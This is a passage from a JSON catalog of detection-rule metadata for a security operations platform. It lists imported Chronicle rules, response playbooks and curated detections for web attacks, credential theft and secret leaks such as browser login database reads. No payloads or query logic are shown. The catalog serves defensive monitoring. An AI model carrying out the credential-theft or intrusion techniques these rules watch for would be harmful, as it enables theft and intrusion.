"wmi_spawning_windows_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wmi_spawning_windows_powershell.yaral" } }, { "id": "chronicle-detection-rules-wmic-ntds-dit-t1003-003-cisa-report", "type": "detection", "name": "wmic_ntds_dit_T1003_003_cisa_report", 
"description": "wmic_ntds_dit_T1003_003_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmic-ntds-dit-t1003-003-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmic_ntds_dit_T1003_003_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/wmic_ntds_dit_T1003_003_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-wmiexec-vbs-script", "type": "detection", "name": "wmiexec_vbs_script", "description": "wmiexec_vbs_script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmiexec-vbs-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmiexec_vbs_script", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/wmiexec_vbs_script.yaral" } }, { "id": "chronicle-detection-rules-wsfjsejsvbavbe-file-execution-sysmon", "type": "detection", "name": 
"wsfjsejsvbavbe_file_execution_sysmon", "description": "wsfjsejsvbavbe_file_execution_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wsfjsejsvbavbe-file-execution-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wsfjsejsvbavbe_file_execution_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/wsf_jse_js_vba_vbe_file_execution__sysmon.yaral" } }, { "id": "chronicle-detection-rules-yispecter-malware-detection", "type": "detection", "name": "yispecter_malware_detection", "description": "yispecter_malware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/yispecter-malware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "yispecter_malware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/yispecter_malware_detection.yaral" } }, { 
"id": "chronicle-detection-rules-zebrocy-tool-apt28-sysmon", "type": "detection", "name": "zebrocy_tool_apt28_sysmon", "description": "zebrocy_tool_apt28_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zebrocy-tool-apt28-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zebrocy_tool_apt28_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/zebrocy_tool_apt28__sysmon.yaral" } }, { "id": "chronicle-detection-rules-zombieboy-cryptomining-worm-sysmon", "type": "detection", "name": "zombieboy_cryptomining_worm_sysmon", "description": "zombieboy_cryptomining_worm_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zombieboy-cryptomining-worm-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zombieboy_cryptomining_worm_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/ioc_sigma/windows/zombieboy_cryptomining_worm__sysmon.yaral" } }, { "id": "chronicle-detection-rules-zoom-and-microsoft-malware-attacks-detection", "type": "detection", "name": "zoom_and_microsoft_malware_attacks_detection", "description": "zoom_and_microsoft_malware_attacks_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zoom-and-microsoft-malware-attacks-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zoom_and_microsoft_malware_attacks_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/zoom_and_microsoft_malware_attacks_detection.yaral" } }, { "id": "chronicle-detection-rules-zoom-phishing-email-fake-zoom-login-page-credential-stealer", "type": "detection", "name": "zoom_phishing_email_fake_zoom_login_page__credential_stealer", "description": "zoom_phishing_email_fake_zoom_login_page__credential_stealer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zoom-phishing-email-fake-zoom-login-page-credential-stealer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zoom_phishing_email_fake_zoom_login_page__credential_stealer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/zoom_phishing_email__fake_zoom_login_page___credential_stealer.yaral" } }, { "id": "chronicle-detection-rules-zusy-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "zusy_malware_detector_sysmon_behavior_august_2019", "description": "zusy_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zusy-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zusy_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/zusy_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "cloud-takeover-response-v1", "type": "detection", "name": "Cloud Account Takeover Response", "description": "Responds to cloud account takeover or unauthorized IAM activity. 
Disables compromised credentials, revokes suspicious API keys, audits recent API calls, and alerts the cloud security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "cloud", "account-takeover", "iam", "aws", "gcp", "azure" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/cloud-takeover-response.yaml" }, { "id": "community-aisoc-hello-hunt-aws-root-login", "type": "detection", "name": "[Hello Hunt] AWS Root Account Console Login", "description": "Tutorial detection from apps/docs/docs/detections/hello-hunt.md.\nFires when AWS CloudTrail records a successful console login under the\n`Root` user identity. Real environments should keep the AWS root account\nunused except for break-glass \u2014 any successful console login is worth a\nhuman eyeballing.\n\nThis rule is intentionally minimal so first-time contributors can read\nit end to end. See `apps/docs/docs/detections/hello-hunt.md` for a full\nwalkthrough.", "version": "1.0.0", "author": "AiSOC Tutorial", "tags": [ "tlp.white", "tutorial" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": false, "source": "community", "tier": "community", "enabled": true, "path": "detections/community/cloud/hello-hunt-aws-root-login.yaml" }, { "id": "container-escape-response-v1", "type": "detection", "name": "Container Escape Response", "description": "Responds to detected container escape attempts or privileged container misuse. 
Terminates the offending container, cordons the node, captures runtime forensics, and alerts the platform security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "container", "kubernetes", "docker", "escape", "runtime-security" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/container-escape-response.yaml" }, { "id": "critical-vulnerability-response-v1", "type": "detection", "name": "Critical Vulnerability Response", "description": "Responds to critical CVEs (CVSS >= 9.0) affecting production systems. Triggers emergency patch workflows, scans for exploitation indicators, applies virtual patching via WAF/IPS where possible, and escalates to the vulnerability management team with a remediation deadline.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "vulnerability", "cve", "patch-management", "critical", "vuln-management" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/critical-vulnerability-response.yaml" }, { "id": "det-application-001", "type": "detection", "name": "SQL Injection Attempt in HTTP Query", "description": "Detects HTTP requests containing common SQL injection payload patterns in query strings or POST bodies. 
Strong indicator of automated probing or active exploitation against web applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/sql-injection-attempt.yaml" }, { "id": "det-application-002", "type": "detection", "name": "Cross-Site Scripting Attempt", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Cross-Site Scripting Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/xss-attempt.yaml" }, { "id": "det-application-003", "type": "detection", "name": "Path Traversal Attempt in HTTP Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Path Traversal Attempt in HTTP Request'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1083" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/path-traversal.yaml" }, { "id": "det-application-004", "type": "detection", "name": "SSRF Attempt to Cloud Metadata Endpoint", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SSRF Attempt to Cloud Metadata Endpoint'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190", "T1212" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/ssrf-attempt.yaml" }, { "id": "det-application-005", "type": "detection", "name": "Log4Shell JNDI Pattern in HTTP Header", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Log4Shell JNDI Pattern in HTTP Header'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/log4shell.yaml" }, { "id": "det-application-006", "type": "detection", "name": "Webshell File Upload Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Webshell File Upload Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1505.003" ], "log_source": "waf", "playbook": "tpl-webshell", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/webshell-upload.yaml" }, { "id": "det-application-007", "type": "detection", "name": "OS Command Injection in HTTP Parameter", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'OS Command Injection in HTTP Parameter'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1059" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/command-injection.yaml" }, { "id": "det-application-008", "type": "detection", "name": "Rate Limit Burst on Authentication Endpoint", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Rate Limit Burst on Authentication Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1110" ], "log_source": "waf", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/rate-limit-burst.yaml" }, { "id": "det-application-009", "type": "detection", "name": "GraphQL Introspection Query in Production", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Introspection Query in Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "application", "mitre_techniques": [ "T1592" ], "log_source": "waf", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/graphql-introspection.yaml" }, { "id": "det-application-010", "type": "detection", "name": "Hard-Coded API Key Pattern Leaked in HTTP Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Hard-Coded API Key Pattern Leaked in HTTP Request'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1552.001" ], "log_source": "waf", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/api-key-leak-in-request.yaml" }, { "id": "det-application-011", "type": "detection", "name": "Known-Bad Scanner User-Agent", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Known-Bad Scanner User-Agent'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "application", "mitre_techniques": [ "T1595.002" ], "log_source": "waf", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/user-agent-known-tool.yaml" }, { "id": "det-application-012", "type": "detection", "name": "JWT With alg=none in Authorization Header", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'JWT With alg=none in Authorization Header'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1078" ], "log_source": "waf", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/jwt-none-alg.yaml" }, { "id": "det-application-013", "type": "detection", "name": "Open Redirect Pattern in URL Parameter", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Open Redirect Pattern in URL Parameter'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1204.001" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/open-redirect.yaml" }, { "id": "det-application-014", "type": "detection", "name": "Build Pipeline Fetched Public Package With Internal Name", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Build Pipeline Fetched Public Package With Internal Name'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "build", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/dependency-confusion-fetch.yaml" }, { "id": "det-application-015", "type": "detection", "name": "Secret-Pattern Match in CI Job Log", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Secret-Pattern Match in CI Job Log'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1552.001" ], "log_source": "ci", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/ci-secret-printed-to-log.yaml" }, { "id": "det-application-016", "type": "detection", "name": "Push to Protected Branch by Non-Admin", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Push to Protected Branch by Non-Admin'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/github-protected-branch-bypass.yaml" }, { "id": "det-application-017", "type": "detection", "name": "Internal Repository Made Public", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Internal Repository Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "github", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/github-public-repo-flip.yaml" }, { "id": "det-application-018", "type": "detection", "name": "Kubernetes Pulled Image From Untrusted Registry", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Kubernetes Pulled Image From Untrusted Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1525" ], "log_source": "kubernetes", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/container-image-pulled-untrusted-registry.yaml" }, { "id": "det-application-019", "type": "detection", "name": "Sequential ID Enumeration Pattern Against API", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Sequential ID Enumeration Pattern Against API'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1592" ], "log_source": "waf", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/api-mass-enumeration-ids.yaml" }, { "id": "det-application-020", "type": "detection", "name": "API Returned Object Outside Caller's Tenant", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'API Returned Object Outside Caller's Tenant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1212" ], "log_source": "app", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/api-permission-bypass-idor.yaml" }, { "id": "det-application-021", "type": "detection", "name": "POST Without Referer/Origin to Sensitive Endpoint", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'POST Without Referer/Origin to Sensitive Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/csrf-on-sensitive-mutation.yaml" }, { "id": "det-application-022", "type": "detection", "name": "Java/Python Deserialization Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Java/Python Deserialization Pattern'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/deserialization-attack.yaml" }, { "id": "det-application-023", "type": "detection", "name": "GitLab Runner Registered as Shared Without Approval", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GitLab Runner Registered as Shared Without Approval'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1525" ], "log_source": "gitlab", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/gitlab-runner-shared-tag.yaml" }, { "id": "det-application-024", "type": "detection", "name": "SaaS File Mass Public-Share by Single User", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SaaS File Mass Public-Share by Single User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "google-workspace", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/saas-mass-share-public.yaml" }, { "id": "det-application-025", "type": "detection", "name": "Slack Token Posted in Public Channel", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Slack Token Posted in Public Channel'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1552.004" ], "log_source": "slack", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/slack-token-exposed.yaml" }, { "id": "det-application-026", "type": "detection", "name": "Marketplace App Installed With Broad Scopes", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Marketplace App Installed With Broad Scopes'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1098.001" ], "log_source": "google-workspace", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/saas-app-installed.yaml" }, { "id": "det-application-027", "type": "detection", "name": "Process Reading Browser Login Database", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Process Reading Browser Login Database'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1555.003" ], "log_source": "edr", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/browser-credential-grabber.yaml" }, { "id": "det-application-028", "type": "detection", "name": "Outbound RDP Connection Initiated From Workstation to Internet", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Outbound RDP Connection Initiated From Workstation to Internet'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1572" ], "log_source": "ndr", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/rdp-tickling.yaml" }, { "id": "det-application-029", "type": "detection", "name": "Microsoft 365 Brand Impersonation Phishing URL", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Microsoft 365 Brand Impersonation Phishing URL'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1566.002" ], "log_source": "email", "playbook": "tpl-phishing", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/phishing-ms365-impersonation.yaml" }, { "id": "det-application-030", "type": "detection", "name": "Email Attachment with Double Extension Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Email Attachment with Double Extension Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1566.001" ], "log_source": "email", "playbook": "tpl-phishing", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/phishing-attachment-double-extension.yaml" }, { "id": "det-application-031", "type": "detection", "name": "Server-Side Template Injection Pattern In Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Server-Side Template Injection Pattern In Request'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-ssti-pattern.yaml" }, { "id": "det-application-032", "type": "detection", "name": "XML External Entity Reference In Request Body", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'XML External Entity Reference In Request Body'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-xxe-pattern.yaml" }, { "id": "det-application-033", "type": "detection", "name": "NoSQL Injection Operator In Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'NoSQL Injection Operator In Request'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-nosql-injection.yaml" }, { "id": "det-application-034", "type": "detection", "name": "GraphQL Introspection Query Against Production", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Introspection Query Against Production'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1213" ], "log_source": "api-gateway", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-graphql-introspection.yaml" }, { "id": "det-application-035", "type": "detection", "name": "GraphQL Query With Excessive Recursion Depth", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Query With Excessive Recursion Depth'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1499" ], "log_source": "api-gateway", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-graphql-deep-recursion.yaml" }, { "id": "det-application-036", "type": "detection", "name": "JNDI LDAP Lookup Pattern (Log4Shell-Style)", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'JNDI LDAP Lookup Pattern (Log4Shell-Style)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-jndi-log4shell.yaml" }, { "id": "det-application-037", "type": "detection", "name": "Spring4Shell Class Loader Manipulation Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Spring4Shell Class Loader Manipulation Pattern'. 
